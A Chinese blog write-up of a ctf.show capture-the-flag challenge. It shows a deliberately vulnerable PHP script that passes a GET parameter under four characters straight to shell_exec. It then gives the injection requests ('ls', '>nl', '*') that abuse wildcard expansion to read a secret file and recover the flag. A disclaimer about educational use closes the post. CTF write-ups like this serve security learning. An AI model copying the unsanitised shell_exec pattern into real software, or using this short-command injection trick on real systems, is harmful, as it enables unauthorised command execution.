获得百分之百的快乐
3
阿呆开发了自己的博客系统,准备对欺负他的大佬口吐芬芳
解法
<?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<4){
echo shell_exec($_GET[1]);
}
else{
echo "hack!!!";
}
?>
//by Firebasky
//by Firebasky
只能执行长度小于四的命令。先看看有哪些文件:
https://56dcf333-a4d9-4eae-8545-cba9202fbf33.challenge.ctf.show/?1=ls
secretsecret_ctfshow_36dddddddddd.php 文件名很长,无法直接使用。
创建一个叫 nl 的文件。
https://d10681bd-ab06-4ac1-b7a0-ad59374670e4.challenge.ctf.show/?1=>nl
访问 nl。
https://d10681bd-ab06-4ac1-b7a0-ad59374670e4.challenge.ctf.show/?1=*
执行成功。
flag 在注释里。
Flag
ctfshow{ed72b01b-1181-444a-9bd1-309727ea06b0}
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。